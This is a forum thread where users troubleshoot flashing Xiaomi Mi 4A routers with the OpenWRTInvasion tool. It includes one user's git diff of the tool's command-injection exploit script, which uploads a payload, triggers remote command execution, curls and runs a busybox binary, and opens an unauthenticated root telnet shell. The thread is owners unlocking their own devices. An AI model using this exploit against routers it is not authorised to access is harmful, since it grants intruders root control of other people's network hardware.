Xiaomi Mi Router 4A Gigabit Edition (R4AG/R4A Gigabit) -- fully supported and flashable with OpenWRTInvasion

For Developers
715

yes

Connection specific DNS suffix. . :
Link: local IPv6 address. . . : fe80 :: f163: 124e: 6ecc: 7f2b%
Automatic configuration IPv4 address: 169.254.127.43
Subnet mask. . . . . . . . . . . . : 255.255.0.0
Default Gateway. . . . . :

716

It seems all has gone ok

Router IP address: 192.168.1.91
stok: xxxxxxxxxxxxxxxxxxxx
****************
router_ip_address: 192.168.1.91
stok: xxxxxxxxxxxxxxxxxxxxxxxxxx
****************
start uploading config file...
start exec command...
done! Now you can connect to the router using telnet (user: root, password: none)
In MacOS, execute in the terminal:
telnet 192.168.1.91

But then telnet does not work (and also FTP doesn't)

vittorio@vittorio-Notebook ~/OpenWRTInvasion $ telnet 192.168.1.91
Trying 192.168.1.91...
telnet: Unable to connect to remote host: Connection refused

I've retried the exploit and rebooted copying the new stok.
What can I check?

Thanks

717

Hmmm that's probably not given via DHCP so would say it's not working. When you tried the debrick method, I know the light didn't flash but did you get anything in the log saying that something tried to connect?

718

As per the video, try run the exploit again. If that fails try reboot the router and run again (but remember that if you reboot the router it will can't your Stok code so you will need to relogin and copy the new one)

719

already done at least three times as below
exploit->exploit again->reboot and get new stok and repeat all three times

1 Like
720

get the data when I don't set the IP on the PC, when I put a fixed IP it stops generating that data

Screenshot_20200516-160515_Gallery
Screenshot_20200516-160515_Gallery720×312 176 KB

721

Try the method described here with that software, I always found bootp buggy. Also unplug the rest of the network if you have anything else on it

722

That normally cures the issue, what OS are you using do you have anything firewalls outgoing?

@morhimi did you have any similar issues?

723

I've been testing for more than 2 hours without existing so far

when the IP of the ethernet in the PC changes, it stops generating the data of the previous picture

724

Sorry I ment to post the link, try this method:

725

I'm on a laptop with Linux Mint
The Xiaomi router is connected via WAN to a Fritz 7590 (no firewall) and the laptop is connected to the Xiaomi router via wireless and internet access works fine.

I have AdGuard on my network, but I've disabled during exploit and trying telnet

726

The only thing that is different from how I've done it successfully in the past is that I've never done the exploit via wireless, try plugging into one of the LAN ports with your laptop and see if that works?

727

Don't know why, but if I connect wired, I loose internet connection, even if WAN is still connected to main router.
Xiaomi router is set as wired repeater

728

I already tried it, the same without success

729

I'm sorry then, I'll have a think but hopefully someone else has some ideas. My final suggestion would be to get a CH341 and reflash the chip with a known working firmware for your exact model

2 Likes
730

That would be my last chance.

I will try to reset the router and start from scratch...

Thanks!!!

1 Like
731

thanks, I have no knowledge of operating the CH341

732

what did you do? which router do you have?

1 Like
733

Hello,
The problem of woody4165 looks completely similar to my issue. (Xiaomi Mi Router 4A Gigabit Edition (R4AG/R4A Gigabit) -- fully supported and flashable with OpenWRTInvasion).
As suggestion by hoddy, I had aleady tried to telnet from my windows computer and from the raspberrypi.Both ending the same way with telnet connection refused.

Compare to woody, my rpi is connected trhough lan to the xiaomi router and my computer through xiaomi wifi. Both cases I have intenet connexion.

I am waiting for a SPI flasher but it might take time to come. That's why I was hoping to flash is thanks to the Invasion.

And my router is under version 2.28.62, latest official firmware available, and supposed to work..

734

I actually didn't face such issues
in my case, the routers were fresh out of the box, configured with their default config.
I did initial setup in order to set wifi password when my mac is connected to lan port and the wan port connected to a nearby switch for internet access.

Once the router was working, I started to run the exploit from terminal, at the time (not sure if it's still the same) the exploit code asked for STOK as user input and didn't print the response from the server.

I hard coded my STOK in the script (probably not needed) and enabled the printing of the responses, that is how I saw that I received what looked like bad response and the exploit didn't work, it appeared that somehow the STOK has changed, so after updating the STOK everything went smooth.

since the router was connected to internet and my 4A 100M has official 19.07 image I just fetched the file to /tmp and wrote it.

My git diff:

~/r/OpenWRTInvasion ❯❯❯ git diff                                                                                                                                                                                                                    master ✱ ◼
diff --git a/remote_command_execution_vulnerability.py b/remote_command_execution_vulnerability.py
index af5842b..3b681da 100644
--- a/remote_command_execution_vulnerability.py
+++ b/remote_command_execution_vulnerability.py
@@ -18,12 +18,14 @@ import shutil
 import tarfile
 import requests

-router_ip_address = input("Router IP address: ")
-# router_ip_address = "192.168.0.21"
+# router_ip_address = input("Router IP address: ")^M
+router_ip_address = "192.168.31.1"^M

 # get stok
-stok = input("stok: ")
-# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"
+# stok = input("stok: ")^M
+# stok = "25bc061fc6f48fdbdda2359b844aa13f" mi4ac1^M
+stok = "8a65444b70fa14ebcd64bc29679ee509" # mi4ac2^M
+stok = "d86d055fdb0a91b38c539319b744bb46"^M

 # From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
 # In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
@@ -61,12 +63,12 @@ with tarfile.open("build/payload.tar.gz", "w:gz") as tar:
 ## upload config file
 print("start uploading config file...")
 r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
-# print(r1.text)
+print(r1.text)^M

 ## exec download speed test, exec command
 print("start exec command...")
 r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
-# print(r2.text)
+print(r2.text)^M

 print("done! Now you can connect to the router using telnet (user: root, password: none)")
 print("In MacOS, execute in the terminal:")
diff --git a/script.sh b/script.sh
index ff3c519..d37669d 100644
--- a/script.sh
+++ b/script.sh
@@ -16,6 +16,7 @@ exploit() {
     rm -rf busybox
     curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --output busybox
     chmod +x busybox
+    sleep 30

     # Start telnet
     ./busybox telnetd```
1 Like